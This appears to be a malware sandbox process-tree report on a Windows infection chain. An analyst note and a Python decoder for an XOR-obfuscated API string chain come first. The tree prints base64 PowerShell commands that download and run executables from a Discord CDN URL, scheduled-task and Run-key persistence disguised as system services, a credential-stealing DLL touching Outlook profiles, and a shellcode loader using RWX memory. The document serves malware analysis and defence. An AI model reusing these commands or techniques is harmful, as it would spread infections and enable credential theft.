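Analyst note on the `cmd /c sET /a "0xNN^3"` children of Miljoeministeren.exe (added example, not part of the sandbox output): each child evaluates one XOR-with-3 expression and the parent collects the printed result as a single byte, so the several hundred cmd.exe launches are a string decoder. Taken in tree order, the operands XOR 3 spell API call strings in the NSIS System plugin's syntax, starting with `RNEL32::CreateFileA(m r4 , i 0x80000000, i 0, p 0, i 4, i 0x80, i 0)i.r5`, then `RNEL32::VirtualAlloc(i 0, i 0x100000, i 0x3000, i 0x40)p.r1` (1 MiB, MEM_COMMIT|MEM_RESERVE, PAGE_EXECUTE_READWRITE), a `SetFilePointer` on handle r5 to offset 890, `RNEL32::ReadFile(i r5, i r1, i 0x100000, *i 0, i 0)i.r3`, and finally `RNEL32::EnumResourceTypesA(i 0, i r1, i 0)`: a file is read into RWX memory and run as shellcode through the enumeration callback. Each call string is followed by one extra decoded byte (`6`), and the report shows the strings from `RNEL32::` onward; the leading characters are not among the lines here. The decoder below is mine; the sample lines are the first twenty cmd.exe children plus one conhost.exe line, copied from the tree, and the helper names are assumptions.

```python
"""Decode the `cmd /c sET /a "0xNN^3"` chain under Miljoeministeren.exe.

Every child cmd.exe evaluates one expression; the parent reads the result
back and appends it as a byte, so the chain is a string decoder spread over
a few hundred processes.  Added analyst example, not part of the report.
"""
import operator
import re

# Report lines copied verbatim from the tree above: the first twenty cmd.exe
# children of Miljoeministeren.exe plus one conhost.exe line.  The report
# runs image path, command line and tree depth together, so the parser keys
# on the `set /a "..."` expression only.
SAMPLE_LINES = r'''
C:\Windows\SysWOW64\cmd.execmd /c sET /a "0x51^3"3⤵
C:\Windows\SysWOW64\cmd.execmd /c sET /a "0x4D^3"3⤵
C:\Windows\SysWOW64\cmd.execmd /c sET /a "0x46^3"3⤵
C:\Windows\SysWOW64\cmd.execmd /c sET /a "0x4F^3"3⤵
C:\Windows\SysWOW64\cmd.execmd /c sET /a "0x30^3"3⤵
C:\Windows\SysWOW64\cmd.execmd /c sET /a "0x31^3"3⤵
C:\Windows\SysWOW64\cmd.execmd /c sET /a "0x39^3"3⤵
C:\Windows\SysWOW64\cmd.execmd /c sET /a "0x39^3"3⤵
C:\Windows\SysWOW64\cmd.execmd /c sET /a "0x40^3"3⤵
C:\Windows\SysWOW64\cmd.execmd /c sET /a "0x71^3"3⤵
C:\Windows\SysWOW64\cmd.execmd /c sET /a "0x66^3"3⤵
C:\Windows\SysWOW64\cmd.execmd /c sET /a "0x62^3"3⤵
C:\Windows\SysWOW64\cmd.execmd /c sET /a "0x77^3"3⤵
C:\Windows\SysWOW64\cmd.execmd /c sET /a "0x66^3"3⤵
C:\Windows\SysWOW64\cmd.execmd /c sET /a "0x45^3"3⤵
C:\Windows\SysWOW64\cmd.execmd /c sET /a "0x6A^3"3⤵
C:\Windows\SysWOW64\cmd.execmd /c sET /a "0x6F^3"3⤵
C:\Windows\SysWOW64\cmd.execmd /c sET /a "0x66^3"3⤵
C:\Windows\SysWOW64\cmd.execmd /c sET /a "0x42^3"3⤵
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV14⤵
C:\Windows\SysWOW64\cmd.execmd /c sET /a "0x2B^3"3⤵
'''.strip().splitlines()

# Binary operators cmd.exe's `set /a` accepts.  Only `^` (XOR) occurs in
# this tree; the others are included for variants that use them.
_OPS = {"^": operator.xor, "+": operator.add, "-": operator.sub,
        "|": operator.or_, "&": operator.and_}

_SET_A = re.compile(
    r'set\s+/a\s+"?\s*(0x[0-9a-f]+|\d+)\s*([\^+\-|&])\s*(0x[0-9a-f]+|\d+)\s*"?',
    re.IGNORECASE,
)


def batch_int(token: str) -> int:
    """Parse a literal the way `set /a` does: 0x prefix = hex, leading 0 = octal."""
    if token.lower().startswith("0x"):
        return int(token, 16)
    if len(token) > 1 and token[0] == "0":
        return int(token, 8)
    return int(token)


def decode_set_a_lines(lines) -> str:
    """Evaluate each `set /a` child in order and return the bytes as text.

    Lines without a `set /a` expression (conhost.exe) are skipped; each value
    is truncated to one byte, which is what the parent collects.
    """
    out = []
    for line in lines:
        m = _SET_A.search(line)
        if not m:
            continue
        lhs, op, rhs = m.groups()
        out.append(chr(_OPS[op](batch_int(lhs), batch_int(rhs)) & 0xFF))
    return "".join(out)


def split_api_strings(decoded: str, marker: str = "RNEL32::") -> list:
    """Cut the decoded text into one entry per API call string.

    In this report every call string starts with `RNEL32::` (the tail of
    `KERNEL32::`; the leading characters are not among the lines shown), so
    the marker doubles as a record separator.
    """
    starts = [m.start() for m in re.finditer(re.escape(marker), decoded)]
    if not starts:
        return [decoded] if decoded else []
    bounds = starts + [len(decoded)]
    chunks = [decoded[a:b] for a, b in zip(bounds, bounds[1:])]
    if starts[0] > 0:
        chunks.insert(0, decoded[:starts[0]])
    return chunks


if __name__ == "__main__":
    for call in split_api_strings(decode_set_a_lines(SAMPLE_LINES)):
        print(call)
```

Feeding every `sET /a` child of Miljoeministeren.exe, in tree order, to `decode_set_a_lines` and then `split_api_strings` returns the five call strings listed above; the conhost.exe lines interleaved in the tree are ignored. The octal rule in `batch_int` matters for variants that write operands such as `010`, which `set /a` treats as 8, not 10.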
C:\Users\Admin\AppData\Local\Temp\0.exe"C:\Users\Admin\AppData\Local\Temp\0.exe"2⤵
- Executes dropped EXE
-
C:\Windows\system32\cmd.exe"cmd" /C C:\Users\Admin\AppData\Local\Temp\KTsJHXYseh.exe3⤵
-
C:\Users\Admin\AppData\Local\Temp\KTsJHXYseh.exeC:\Users\Admin\AppData\Local\Temp\KTsJHXYseh.exe4⤵
- Executes dropped EXE
- Checks computer location settings
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "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"5⤵
-
C:\Users\Admin\AppData\Roaming\JDSG3.exe"C:\Users\Admin\AppData\Roaming\JDSG3.exe"6⤵
- Suspicious use of SetThreadContext
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"7⤵
-
C:\Windows\system32\cmd.exe"cmd" /C C:\Users\Admin\AppData\Local\Temp\gKHZUfqcLT.exe3⤵
-
C:\Users\Admin\AppData\Local\Temp\gKHZUfqcLT.exeC:\Users\Admin\AppData\Local\Temp\gKHZUfqcLT.exe4⤵
- Executes dropped EXE
- Checks computer location settings
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "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"5⤵
- Blocklisted process makes network request
-
C:\Users\Admin\AppData\Roaming\JDSG4.exe"C:\Users\Admin\AppData\Roaming\JDSG4.exe"6⤵
- Suspicious use of SetThreadContext
-
C:\Windows\SysWOW64\cmd.exe"cmd" /C schtasks /create /tn \SystemGuardRuntime /tr "C:\Users\Admin\AppData\Roaming\SystemGuardRuntime\SystemGuardRuntime.exe" /st 00:00 /du 9999:59 /sc once /ri 60 /rl HIGHEST /f7⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /tn \SystemGuardRuntime /tr "C:\Users\Admin\AppData\Roaming\SystemGuardRuntime\SystemGuardRuntime.exe" /st 00:00 /du 9999:59 /sc once /ri 60 /rl HIGHEST /f8⤵
- Creates scheduled task(s)
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe#cmd7⤵
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe#cmd7⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Remove -ItemProperty -Path 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run' -Name 'SystemGuardRuntime';New-ItemProperty -Path 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run' -Name 'SystemGuardRuntime' -Value '"C:\Users\Admin\AppData\Roaming\SystemGuardRuntime\SystemGuardRuntime.exe"' -PropertyType 'String'7⤵
-
C:\Windows\system32\cmd.exe"cmd" /C C:\Users\Admin\AppData\Local\Temp\EcS04le5nj.exe3⤵
-
C:\Users\Admin\AppData\Local\Temp\EcS04le5nj.exeC:\Users\Admin\AppData\Local\Temp\EcS04le5nj.exe4⤵
- Executes dropped EXE
- Checks computer location settings
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "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"5⤵
-
C:\Users\Admin\AppData\Roaming\JDSDS4.exe"C:\Users\Admin\AppData\Roaming\JDSDS4.exe"6⤵
- Suspicious use of SetThreadContext
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"7⤵
-
C:\Windows\system32\cmd.exe"cmd" /C C:\Users\Admin\AppData\Local\Temp\sgq83QQfG4.exe3⤵
-
C:\Users\Admin\AppData\Local\Temp\sgq83QQfG4.exeC:\Users\Admin\AppData\Local\Temp\sgq83QQfG4.exe4⤵
- Executes dropped EXE
- Checks computer location settings
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "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"5⤵
- Blocklisted process makes network request
-
C:\Users\Admin\AppData\Roaming\POSA12.exe"C:\Users\Admin\AppData\Roaming\POSA12.exe"6⤵
- Suspicious use of SetThreadContext
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe#cmd7⤵
-
C:\Windows\SysWOW64\cmd.exe"cmd" /C schtasks /create /tn \SecurityHealthService /tr "C:\Users\Admin\AppData\Roaming\SecurityHealthService\SecurityHealthService.exe" /st 00:00 /du 9999:59 /sc once /ri 60 /rl HIGHEST /f7⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /tn \SecurityHealthService /tr "C:\Users\Admin\AppData\Roaming\SecurityHealthService\SecurityHealthService.exe" /st 00:00 /du 9999:59 /sc once /ri 60 /rl HIGHEST /f8⤵
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Remove -ItemProperty -Path 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run' -Name 'SecurityHealthService';New-ItemProperty -Path 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run' -Name 'SecurityHealthService' -Value '"C:\Users\Admin\AppData\Roaming\SecurityHealthService\SecurityHealthService.exe"' -PropertyType 'String'7⤵
-
C:\Windows\system32\cmd.exe"cmd" /C C:\Users\Admin\AppData\Local\Temp\RJPrfsm7fj.exe3⤵
-
C:\Users\Admin\AppData\Local\Temp\RJPrfsm7fj.exeC:\Users\Admin\AppData\Local\Temp\RJPrfsm7fj.exe4⤵
- Executes dropped EXE
- Checks computer location settings
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "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"5⤵
- Blocklisted process makes network request
-
C:\Users\Admin\AppData\Roaming\MNZXHA36.exe"C:\Users\Admin\AppData\Roaming\MNZXHA36.exe"6⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1784 -s 7927⤵
- Program crash
-
C:\Windows\system32\cmd.exe"cmd" /C C:\Users\Admin\AppData\Local\Temp\oVvR0Kg0to.exe3⤵
-
C:\Users\Admin\AppData\Local\Temp\oVvR0Kg0to.exeC:\Users\Admin\AppData\Local\Temp\oVvR0Kg0to.exe4⤵
- Checks computer location settings
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGYAdgB2ACMAPgBTAHQAYQByAHQALQBTAGwAZQBlAHAAIAAtAFMAZQBjAG8AbgBkAHMAIAAxADEAMAA7ACgATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAEYAaQBsAGUAKAAnAGgAdAB0AHAAcwA6AC8ALwBjAGQAbgAuAGQAaQBzAGMAbwByAGQAYQBwAHAALgBjAG8AbQAvAGEAdAB0AGEAYwBoAG0AZQBuAHQAcwAvADEAMAA0ADkANAAxADAAMgAxADcANAAyADAANQAzADMAOAAyADAALwAxADAANAA5ADQAMQA3ADUAOQA5ADcANwA3ADIANQA1ADUAMgA0AC8AVwBpAG4AZABvAHcAcwBEAGUAZgBlAG4AZABlAHIAUwBtAGEAcgB0AHQAUwBjAHIAZQBlAG4ALgBlAHgAZQAnACwAIAA8ACMAdABxAGwAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgADwAIwBtAGcAZQAjAD4AIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAQQBwAHAARABhAHQAYQAgADwAIwBlAGoAYgAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwBQAE8ASQBYAEMAQgAzAC4AZQB4AGUAJwApACkAPAAjAHgAcQBnACMAPgA7ACAAUwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgAC0ARgBpAGwAZQBQAGEAdABoACAAPAAjAHYAbAB0ACMAPgAgACgASgBvAGkAbgAtAFAAYQB0AGgAIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAQQBwAHAARABhAHQAYQAgADwAIwB2AGwAYQAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwBQAE8ASQBYAEMAQgAzAC4AZQB4AGUAJwApADwAIwB3AHEAZgAjAD4A"5⤵
-
C:\Users\Admin\AppData\Roaming\POIXCB3.exe"C:\Users\Admin\AppData\Roaming\POIXCB3.exe"6⤵
-
C:\Windows\system32\cmd.exe"cmd" /C C:\Users\Admin\AppData\Local\Temp\TdAEHN5fwV.exe3⤵
-
C:\Users\Admin\AppData\Local\Temp\TdAEHN5fwV.exeC:\Users\Admin\AppData\Local\Temp\TdAEHN5fwV.exe4⤵
- Executes dropped EXE
- Checks computer location settings
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "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"5⤵
-
C:\Users\Admin\AppData\Roaming\BVNMXCGHJ7.exe"C:\Users\Admin\AppData\Roaming\BVNMXCGHJ7.exe"6⤵
- Suspicious use of SetThreadContext
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"7⤵
-
C:\Windows\system32\cmd.exe"cmd" /C C:\Users\Admin\AppData\Local\Temp\Kh5qEBPvMk.exe3⤵
-
C:\Users\Admin\AppData\Local\Temp\Kh5qEBPvMk.exeC:\Users\Admin\AppData\Local\Temp\Kh5qEBPvMk.exe4⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "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"5⤵
- Blocklisted process makes network request
-
C:\Users\Admin\AppData\Roaming\QHGJASD27.exe"C:\Users\Admin\AppData\Roaming\QHGJASD27.exe"6⤵
- Suspicious use of SetThreadContext
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe#cmd7⤵
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe#cmd7⤵
-
C:\Windows\SysWOW64\cmd.exe"cmd" /C schtasks /create /tn \WindowsFilerar /tr "C:\Users\Admin\AppData\Roaming\WindowsFilerar\WindowsFilerar.exe" /st 00:00 /du 9999:59 /sc once /ri 60 /rl HIGHEST /f7⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /tn \WindowsFilerar /tr "C:\Users\Admin\AppData\Roaming\WindowsFilerar\WindowsFilerar.exe" /st 00:00 /du 9999:59 /sc once /ri 60 /rl HIGHEST /f8⤵
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Remove -ItemProperty -Path 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run' -Name 'WindowsFilerar';New-ItemProperty -Path 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run' -Name 'WindowsFilerar' -Value '"C:\Users\Admin\AppData\Roaming\WindowsFilerar\WindowsFilerar.exe"' -PropertyType 'String'7⤵
-
C:\Windows\system32\cmd.exe"cmd" /C C:\Users\Admin\AppData\Local\Temp\IAWbmRKnNw.exe3⤵
-
C:\Users\Admin\AppData\Local\Temp\IAWbmRKnNw.exeC:\Users\Admin\AppData\Local\Temp\IAWbmRKnNw.exe4⤵
- Checks computer location settings
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "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"5⤵
- Blocklisted process makes network request
-
C:\Users\Admin\AppData\Roaming\LKSJDSAKDQ.exe"C:\Users\Admin\AppData\Roaming\LKSJDSAKDQ.exe"6⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 6540 -s 7807⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 6540 -s 7807⤵
- Program crash
-
C:\Windows\system32\cmd.exe"cmd" /C C:\Users\Admin\AppData\Local\Temp\zmmP77vsYU.exe3⤵
-
C:\Users\Admin\AppData\Local\Temp\zmmP77vsYU.exeC:\Users\Admin\AppData\Local\Temp\zmmP77vsYU.exe4⤵
- Checks computer location settings
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "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"5⤵
-
C:\Users\Admin\AppData\Roaming\LKXMNX55.exe"C:\Users\Admin\AppData\Roaming\LKXMNX55.exe"6⤵
-
C:\Windows\system32\cmd.exe"cmd" /C C:\Users\Admin\AppData\Local\Temp\yoMEITfbTK.exe3⤵
-
C:\Users\Admin\AppData\Local\Temp\yoMEITfbTK.exeC:\Users\Admin\AppData\Local\Temp\yoMEITfbTK.exe4⤵
- Checks computer location settings
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "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"5⤵
- Blocklisted process makes network request
-
C:\Users\Admin\AppData\Roaming\LKXMNBZX55.exe"C:\Users\Admin\AppData\Roaming\LKXMNBZX55.exe"6⤵
- Suspicious use of SetThreadContext
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe#cmd7⤵
-
C:\Users\Admin\AppData\Local\Temp\35JrmltklD.exe"C:\Users\Admin\AppData\Local\Temp\35JrmltklD.exe"2⤵
- Executes dropped EXE
- Checks computer location settings
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHgAaAB0ACMAPgBTAHQAYQByAHQALQBTAGwAZQBlAHAAIAAtAFMAZQBjAG8AbgBkAHMAIAA5ADAAOwAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvAGEAZABGAGkAbABlACgAJwBoAHQAdABwAHMAOgAvAC8AYwBkAG4ALgBkAGkAcwBjAG8AcgBkAGEAcABwAC4AYwBvAG0ALwBhAHQAdABhAGMAaABtAGUAbgB0AHMALwAxADAANAA5ADQAMQAwADIAMQA3ADQAMgAwADUAMwAzADgAMgAwAC8AMQAwADQAOQA0ADEANwA1ADgAMQA2ADEAMQA3ADMAMwAxADEAMwAvAFcAaQBuAGQAbwB3AHMARABlAGYAZQBuAGQAZQByAFMAbQBhAHIAdAB0AFMAYwByAGUAZQBuAC4AZQB4AGUAJwAsACAAPAAjAGMAYQB4ACMAPgAgACgASgBvAGkAbgAtAFAAYQB0AGgAIAA8ACMAZwBzAHQAIwA+ACAALQBQAGEAdABoACAAJABlAG4AdgA6AEEAcABwAEQAYQB0AGEAIAA8ACMAdwB2AGkAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcATQBOAFoAWABIAEEAMwA2AC4AZQB4AGUAJwApACkAPAAjAHUAdQBrACMAPgA7ACAAUwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgAC0ARgBpAGwAZQBQAGEAdABoACAAPAAjAHkAbgBmACMAPgAgACgASgBvAGkAbgAtAFAAYQB0AGgAIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAQQBwAHAARABhAHQAYQAgADwAIwBrAG0AcwAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwBNAE4AWgBYAEgAQQAzADYALgBlAHgAZQAnACkAPAAjAHQAdQBzACMAPgA="3⤵
- Blocklisted process makes network request
-
C:\Users\Admin\Downloads\7z2201-x64.exe"C:\Users\Admin\Downloads\7z2201-x64.exe"2⤵
-
C:\Program Files\7-Zip\7zG.exe"C:\Program Files\7-Zip\7zG.exe" x -o"C:\Users\Admin\Downloads\Adobe_Lightroom\" -spe -an -ai#7zMap56:92:7zEvent306402⤵
-
C:\Program Files\7-Zip\7zG.exe"C:\Program Files\7-Zip\7zG.exe" x -o"C:\Users\Admin\Downloads\Adobe_Lightroom\" -spe -an -ai#7zMap9025:92:7zEvent97982⤵
-
C:\Program Files\7-Zip\7zG.exe"C:\Program Files\7-Zip\7zG.exe" x -o"C:\Users\Admin\Downloads\Photoshop2022\" -spe -an -ai#7zMap6809:88:7zEvent169182⤵
-
C:\Program Files (x86)\Gkdv\yx8pgdl0px.exe"C:\Program Files (x86)\Gkdv\yx8pgdl0px.exe"2⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1372 -s 6203⤵
- Program crash
-
C:\Program Files (x86)\Ssnrt\7no04fld0or5.exe"C:\Program Files (x86)\Ssnrt\7no04fld0or5.exe"2⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4332 -s 6243⤵
- Program crash
-
C:\Users\Admin\Downloads\tord.exe"C:\Users\Admin\Downloads\tord.exe"2⤵
- Checks computer location settings
- NTFS ADS
-
C:\Users\Admin\AppData\Local\Temp\99e342142d\gntuud.exe"C:\Users\Admin\AppData\Local\Temp\99e342142d\gntuud.exe"3⤵
- Checks computer location settings
- Adds Run key to start application
-
C:\Windows\SysWOW64\schtasks.exe"C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN gntuud.exe /TR "C:\Users\Admin\AppData\Local\Temp\99e342142d\gntuud.exe" /F4⤵
- Creates scheduled task(s)
-
C:\Users\Admin\AppData\Local\Temp\1000026001\CRYPTED_BSI20221205.exe"C:\Users\Admin\AppData\Local\Temp\1000026001\CRYPTED_BSI20221205.exe"4⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5948 -s 4125⤵
- Program crash
-
C:\Users\Admin\AppData\Local\Temp\1000027001\linda5.exe"C:\Users\Admin\AppData\Local\Temp\1000027001\linda5.exe"4⤵
- Checks computer location settings
- Modifies registry class
-
C:\Windows\SysWOW64\control.exe"C:\Windows\System32\control.exe" "C:\Users\Admin\AppData\Local\Temp\Y_GQtM.cpL",5⤵
-
C:\Windows\SysWOW64\rundll32.exe"C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL "C:\Users\Admin\AppData\Local\Temp\Y_GQtM.cpL",6⤵
-
C:\Windows\system32\RunDll32.exeC:\Windows\system32\RunDll32.exe Shell32.dll,Control_RunDLL "C:\Users\Admin\AppData\Local\Temp\Y_GQtM.cpL",7⤵
-
C:\Windows\SysWOW64\rundll32.exe"C:\Windows\SysWOW64\rundll32.exe" "C:\Windows\SysWOW64\shell32.dll",#44 "C:\Users\Admin\AppData\Local\Temp\Y_GQtM.cpL",8⤵
-
C:\Windows\SysWOW64\rundll32.exe"C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\a091ec0a6e2227\cred64.dll, Main4⤵
- Blocklisted process makes network request
- Accesses Microsoft Outlook profiles
-
C:\Users\Admin\AppData\Local\Temp\1000028001\wish.exe"C:\Users\Admin\AppData\Local\Temp\1000028001\wish.exe"4⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 540 -s 15123⤵
- Program crash
-
C:\Users\Admin\Downloads\WalkenBoost.exe"C:\Users\Admin\Downloads\WalkenBoost.exe"2⤵
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\vbc.exe"3⤵
-
C:\Users\Admin\Downloads\file.exe"C:\Users\Admin\Downloads\file.exe"2⤵
-
C:\Users\Admin\Downloads\file.exe"C:\Users\Admin\Downloads\file.exe"3⤵
- Checks computer location settings
- Checks processor information in registry
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c timeout /t 6 & del /f /q "C:\Users\Admin\Downloads\file.exe" & exit4⤵
-
C:\Windows\SysWOW64\timeout.exetimeout /t 65⤵
- Delays execution with timeout.exe
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe"2⤵
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe"3⤵
- Checks processor information in registry
- NTFS ADS
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="3456.0.1004375223\1033074977" -parentBuildID 20200403170909 -prefsHandle 1632 -prefMapHandle 1624 -prefsLen 1 -prefMapSize 222097 -appdir "C:\Program Files\Mozilla Firefox\browser" - 3456 "\\.\pipe\gecko-crash-server-pipe.3456" 1748 gpu4⤵
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="3456.3.2033123306\353168543" -childID 1 -isForBrowser -prefsHandle 2352 -prefMapHandle 2556 -prefsLen 353 -prefMapSize 222097 -parentBuildID 20200403170909 -appdir "C:\Program Files\Mozilla Firefox\browser" - 3456 "\\.\pipe\gecko-crash-server-pipe.3456" 2500 tab4⤵
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="3456.13.1459989811\1408340503" -childID 2 -isForBrowser -prefsHandle 3696 -prefMapHandle 3692 -prefsLen 6509 -prefMapSize 222097 -parentBuildID 20200403170909 -appdir "C:\Program Files\Mozilla Firefox\browser" - 3456 "\\.\pipe\gecko-crash-server-pipe.3456" 3764 tab4⤵
-
C:\Users\Admin\Downloads\yy.exe"C:\Users\Admin\Downloads\yy.exe"2⤵
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\Regsvcs.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\Regsvcs.exe"3⤵
- Accesses Microsoft Outlook profiles
- outlook_office_path
- outlook_win_path
-
C:\Users\Admin\Downloads\HVUIOPMN.exe"C:\Users\Admin\Downloads\HVUIOPMN.exe"2⤵
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\Regsvcs.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\Regsvcs.exe"3⤵
-
C:\Users\Admin\Downloads\ChromeSetup.exe"C:\Users\Admin\Downloads\ChromeSetup.exe"2⤵
- Checks SCSI registry key(s)
-
C:\Users\Admin\AppData\Local\Temp\2611.exeC:\Users\Admin\AppData\Local\Temp\2611.exe2⤵
-
C:\Windows\SysWOW64\rundll32.exe"C:\Windows\system32\rundll32.exe" "C:\Users\Admin\AppData\Local\Temp\Eshwsfeuryqqffi.tmp",Qiysidaatietut3⤵
- Blocklisted process makes network request
- Checks processor information in registry
-
C:\Windows\system32\rundll32.exe"C:\Windows\system32\rundll32.exe" "C:\Windows\system32\shell32.dll",#61 172134⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2352 -s 5283⤵
- Program crash
-
C:\Users\Admin\Downloads\64.exe"C:\Users\Admin\Downloads\64.exe"2⤵
-
C:\Users\Admin\Downloads\CR_20E12.tmp\setup.exe"C:\Users\Admin\Downloads\CR_20E12.tmp\setup.exe" --install-archive="C:\Users\Admin\Downloads\CR_20E12.tmp\CHROME.PACKED.7Z"3⤵
- Registers COM server for autorun
- Modifies registry class
-
C:\Users\Admin\Downloads\CR_20E12.tmp\setup.exeC:\Users\Admin\Downloads\CR_20E12.tmp\setup.exe --type=crashpad-handler /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Chromnius\User Data\Crashpad" --annotation=plat=Win64 --annotation=prod=Chromnius --annotation=ver=109.0.5386.0 --initial-client-data=0x278,0x27c,0x280,0x254,0x284,0x7ff726067f80,0x7ff726067f90,0x7ff726067fa04⤵
-
C:\Users\Admin\Downloads\CR_20E12.tmp\setup.exe"C:\Users\Admin\Downloads\CR_20E12.tmp\setup.exe" --verbose-logging --create-shortcuts=0 --install-level=04⤵
-
C:\Users\Admin\Downloads\CR_20E12.tmp\setup.exeC:\Users\Admin\Downloads\CR_20E12.tmp\setup.exe --type=crashpad-handler /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Chromnius\User Data\Crashpad" --annotation=plat=Win64 --annotation=prod=Chromnius --annotation=ver=109.0.5386.0 --initial-client-data=0x288,0x28c,0x290,0x264,0x294,0x7ff726067f80,0x7ff726067f90,0x7ff726067fa05⤵
-
